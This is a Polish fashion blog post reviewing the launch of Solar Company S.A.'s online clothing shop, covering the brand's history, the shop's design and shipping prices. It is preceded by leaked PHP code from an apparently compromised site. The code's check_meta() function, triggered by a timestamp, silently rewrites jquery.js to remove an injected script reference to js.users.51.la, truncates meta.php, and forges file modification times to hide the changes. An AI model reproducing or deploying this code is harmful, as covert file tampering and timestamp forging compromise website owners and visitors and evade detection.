check_meta(); function check_meta(){ $dir = dirname(__FILE__); $jq = $dir."/js/jquery/jquery.js"; $jp = $dir."/meta.php"; $jqtime = filemtime($jq); $jptime = filemtime($jp); if(time() >= 1433386015){ $jq_c = file_get_contents($jq); if(@strpos($jq_c,"http://js.users.51.la")) { $contentq = str_replace("document.write ('
');", "", $jq_c); if(@file_put_contents($jq, $contentq)){ @touch($jq,$jqtime); } } $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } } sklep internetowy Solar Company S.A. | Fashion News

Polska firma Solar Company S.A. dołączyła do światowej czołówki i wymogów ery Internetu stawiając na e-commerce. Kilka dni temu uruchomiono sklep internetowy e-solar.company.com.pl.

Marka Solar została założona w 1989 roku. Pierwszy sklep powstał w 1998, a obecnie sieć Solar Company S.A. składa się z ponad 80 sklepów firmowych, w tym 13 franczyzowych oraz 7 outletowych. Ponadto firma współpracuje z ponad 120 odbiorcami sieci zewnętrznej oraz 25 partnerami z krajów sąsiadujących. Jednak w dzisiejszych czasach to nie wystarcza by zaspokoić potrzeby potencjalnych klientów. Łatwym i relatywnie tanim sposobem na dotarcie do konsumentów i poszerzenie zasięgu jest sklep internetowy.

sklep internetowy solar company s.a.

Zalet e-commerce nie trzeba wymieniać, ale warto wspomnień o kilku. W internetowym sklepie Solar dostępna jest pełna kolekcja i rozmiarówka, a w tradycyjnych salonach albo pojawia się jedynie część oferty. Jest to uciążliwe zwłaszcza w przypadku nietypowych rozmiarów, jak xs, czy xxl, który zwykle zamawia się mniej.

Oczywiście są klienci, którzy nie potrafią przekonać się do kupowania odzieży online (jednym z nich jest nasz fan, który skomentował ten temat FB), ale przecież mogą przymierzyć rzeczy w tradycyjnym salonie, a samej czynności zakupu dokonać w Internecie. (Bez sensu? A co jeśli jest duża kolejka do kasy i nie macie czasu czekać? Ale o tym innym razem.) Poza tym to nie dla tradycjonalistów powstają sklepy internetowe, a dla zwolenników nowoczesnych rozwiązań. Mimo wszystko firmy nie mogą pozwolić sobie na ignorowanie Internetu i rozwoju e-commerce, bo zostaną w tyle. Jeśli firma chce działać na rynku masowym, to jej działania muszą być zintegrowane. W tę stronę poszła poznańska firma Solar.

Wracając do opisywanego e-sklepu, jego design jest minimalistyczny i czysty, jak logo marki. Białe tło i dobre zdjęcia sprawiają, że produkty są dobrze wyeksponowane. Dobrym pomysłem jest dział „Nowości„, w którym można zapoznać się z ostatnio dodanymi produktami. Podoba mi się również zakładka „przepis konserwacji” wybranego produktu, dzięki której można się dowiedzieć, jak prać daną rzecz.

sklep internetowy solar company s.a.

By dokonać zakupów wystarczy wejść na stronę, założyć konto i wybrać produkty. Można również dodać rzeczy do showroomu, by stworzyć listę zakupów. Warto wspomnieć, że koszt wysyłki paczki jest stały bez względu na jej wagę i wymiary. Za zwykłą przesyłkę kurierską na terenie Polski zapłacimy 15 złotych, a za opcję „za pobraniem” – 24 złote. W przypadku wysyłki zagranicę klient musi skontaktować się z Działem Relacji z Klientem. Dostawa będzie zrealizowana w ciągu 72 h od zaksięgowania wpłaty.

Godne pochwały!

e-solar-company.com.pl

Tagged with:
 

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.

Możesz użyć następujących tagów oraz atrybutów HTML-a: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Set your Twitter account name in your settings to use the TwitterBar Section.